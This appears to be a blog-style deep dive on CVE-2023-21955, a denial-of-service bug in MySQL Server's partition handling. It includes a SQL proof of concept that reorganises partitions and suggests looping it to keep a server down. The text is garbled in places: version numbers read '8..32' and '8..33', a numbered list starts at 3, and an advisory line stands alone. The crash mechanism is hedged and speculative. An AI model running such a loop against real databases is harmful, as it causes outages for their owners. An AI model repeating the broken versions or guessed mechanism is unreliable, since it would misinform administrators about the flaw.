CVE-2023-21955 - MySQL Server Partition DoS — A Deep Dive

CVE-2023-21955 is a vulnerability found in Oracle MySQL Server (component: Server: Partition). A user with high privileges who has access over the network can easily crash the server or hang it, causing a denial of service (DoS). The issue mostly affects MySQL versions 8..32 and before.

This bug is easy to exploit and can be used to repeatedly take down affected MySQL servers.

Who is affected?

According to Oracle’s official advisory, any MySQL 8..32 or earlier instance is vulnerable if it:

Allows high-privileged users network access (e.g., DBA, application superuser)

NB: An attacker MUST have account credentials with sufficient privileges (like ALTER, CREATE, or DROP on tables/databases).

CVSS Score: 4.9 (on 10) — so not critical, but still problematic on shared or cloud databases

- Primary risk: The server can be crashed repeatedly, causing downtime and potentially data loss if not set up for crash recovery.

Attack complexity: *Low*, no user interaction needed, only simple SQL queries.

CVSS Vector:  
(CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)

How does the exploit work?

The issue is in the Partition code of MySQL. When a high-privileged user sends certain crafted queries (usually involving altering or dropping partitions in tables), it triggers an unsafe code path, which MySQL fails to handle properly, resulting in a crash or a full hang.

Create a table with partitions.

3. Perform partition operations (e.g., ALTER TABLE ... REORGANIZE PARTITION) with malformed or conflicting definitions.

Proof of Concept: Triggering DoS

Let's see how an attacker (with proper credentials) could exploit this.

Note: This only demonstrates reproducible crash/hang. MODIFY the table/partition names as required for your environment.

-- Step 1: Create a partitioned table
CREATE TABLE exploitable_table (
    id INT NOT NULL,
    stuff VARCHAR(100)
)
PARTITION BY RANGE (id) (
    PARTITION p VALUES LESS THAN (10),
    PARTITION p1 VALUES LESS THAN (100)
);

-- Step 2: Run repeated or malformed ALTER commands
ALTER TABLE exploitable_table REORGANIZE PARTITION p1 INTO (
    PARTITION p2 VALUES LESS THAN (100)
);

-- Some reports indicate running above ALTER multiple times, or mixing DROP/REORGANIZE on same partition can cause crash

-- This may crash or hang the MySQL server process.

In real attacks, a script could loop this command to keep the server down.

Fixed in MySQL 8..33 and later. Update ASAP if you use partitioned tables.

- Oracle Security Alert Advisory

References & More Reading

- Oracle Critical Patch Update Advisory - April 2023
- NVD - CVE-2023-21955
- MySQL Bug #35108560 (Oracle bug DB) *(requires Oracle login for details)*


TL;DR:  
CVE-2023-21955 gives a high-priv user with network access the power to crash your MySQL 8..32 (or earlier) server using certain partition commands. Update MySQL, audit high-priv users, and stay alert for repeat crashes. Don’t ignore server updates!

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 04/27/2023 15:15:00 UTC